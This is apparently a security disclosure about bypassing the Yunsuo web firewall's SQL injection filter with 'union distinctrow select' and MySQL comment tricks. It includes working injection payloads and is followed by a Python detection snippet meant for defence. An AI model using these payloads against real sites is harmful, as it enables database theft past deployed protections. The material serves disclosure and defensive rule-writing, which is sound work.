### Brief description:

Complete bypass of the SQL injection protection rules in the latest version of Yunsuo (云锁), V1.6.153 (UNION is usable).

### Details:

Yunsuo version:

[![C66EC306-F97B-40A6-9FEB-2D96C4A4DAF8.png](https://images.seebug.org/upload/201602/16154028ae4b2214e169a66fc73096013c9f3bc2.png)](https://images.seebug.org/upload/201602/16154028ae4b2214e169a66fc73096013c9f3bc2.png)

[![39536566-EBDD-48F8-B3BD-C51360382A76.png](https://images.seebug.org/upload/201602/16154038ba2d17b347a8202367fc4b0f4720950d.png)](https://images.seebug.org/upload/201602/16154038ba2d17b347a8202367fc4b0f4720950d.png)

MySQL UNION syntax:

```
http://**.**.**.**/doc/refman/5.5/en/union.html
SELECT ...
UNION [ALL | DISTINCT] SELECT ...
[UNION [ALL | DISTINCT] SELECT ...]
```

The previous report covered `union all`:

```
http://**.**.**.**/bugs/wooyun-2016-0170481
```

When Yunsuo filters dangerous requests, two sensitive keywords that sit directly next to each other are blocked, but if something is "inserted" between the two keywords, the rule no longer matches.

`distinct`: `distinctrow` is not mentioned, but it works as well.

### Proof of vulnerability:

Server: Windows Server 2003 + PHP + Apache + MySQL

Client: Windows 7

Website protection enabled:

[![Screenshot 2016-02-16 3.42.21 PM.png](https://images.seebug.org/upload/201602/16154245f4379bc2a1caa814cf82aa2c35646da4.png)](https://images.seebug.org/upload/201602/16154245f4379bc2a1caa814cf82aa2c35646da4.png)

Blocked:

[![Screenshot 2016-02-16 3.43.50 PM.png](https://images.seebug.org/upload/201602/16154413ec572cf57579f6e133f3a0466517b8ef.png)](https://images.seebug.org/upload/201602/16154413ec572cf57579f6e133f3a0466517b8ef.png)

```
1' union distinctrow select/*!USER*/(),/*!DATABASE*/()#
```

[![Screenshot 2016-02-16 3.45.54 PM.png](https://images.seebug.org/upload/201602/16154644947fe247dbaf9cf6d99bb968b118883a.png)](https://images.seebug.org/upload/201602/16154644947fe247dbaf9cf6d99bb968b118883a.png)

```
' union distinctrow select unhex('352E352E34322D6C6F67'),unhex('726F6F74406C6F63616C686F7374')#
```

[![Screenshot 2016-02-16 3.46.12 PM.png](https://images.seebug.org/upload/201602/16154655c0d331cf4f565b3f75834c1a6eab041b.png)](https://images.seebug.org/upload/201602/16154655c0d331cf4f565b3f75834c1a6eab041b.png)

```
FROM
1' union distinctrow select/*!USER*/(),/*!DATABASE*/()/*f*//*r*//*o*//*m*/users#
```

[![Screenshot 2016-02-16 3.46.21 PM.png](https://images.seebug.org/upload/201602/161547057537f8798a200d549cb7095c6592eee3.png)](https://images.seebug.org/upload/201602/161547057537f8798a200d549cb7095c6592eee3.png)
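A defensive illustration of the rule gap described above, added here and not part of the original report or Yunsuo's code: `NAIVE` is an assumed stand-in for an adjacency-only rule, while the normalized check expands MySQL comments and allows the `ALL` / `DISTINCT` / `DISTINCTROW` modifiers between `UNION` and `SELECT`. The rule names and the last two sample strings are constructed for the example.

```python
import re

# Assumed stand-in for an adjacency-only rule (not Yunsuo's real rule): it
# fires only when nothing but whitespace separates UNION and SELECT.
NAIVE = re.compile(r"\bunion\s+select\b", re.I)

VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # /*!USER*/ : body is executed by MySQL
COMMENT = re.compile(r"/\*.*?\*/", re.S)          # /*f*/ : ordinary comment, ignored

# Rules applied after normalization. Names are hypothetical labels.
RULES = [
    # UNION, optional ALL / DISTINCT / DISTINCTROW, optional "(", then SELECT.
    ("union-select", re.compile(
        r"\bunion\b\s*(?:(?:all|distinct|distinctrow)\b\s*)?\(?\s*select\b")),
    # Information functions, with any whitespace before the parenthesis.
    ("info-function", re.compile(r"\b(?:user|database)\s*\(")),
]

def normalize(value):
    """Reduce a parameter value to roughly what the MySQL lexer will see."""
    value = VERSIONED.sub(r" \1 ", value)   # keep executable comment bodies
    value = COMMENT.sub(" ", value)         # drop ordinary comments
    return re.sub(r"\s+", " ", value).strip().lower()

def naive_blocks(value):
    """Adjacency-only check on the raw value."""
    return bool(NAIVE.search(value))

def findings(value):
    """Names of the rules that match the normalized value."""
    text = normalize(value)
    return [name for name, rule in RULES if rule.search(text)]

# First two samples are the payloads shown in the report; the rest are constructed.
SAMPLES = [
    "1' union distinctrow select/*!USER*/(),/*!DATABASE*/()#",
    "' union distinctrow select unhex('352E352E34322D6C6F67'),unhex('726F6F74406C6F63616C686F7374')#",
    "1' union select user(),database()#",
    "trade union members select a delegate",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(naive_blocks(sample), findings(sample), sample[:40])
```

Signature matching of this kind stays a secondary control; binding the parameter in a prepared statement removes the injection point these requests depend on.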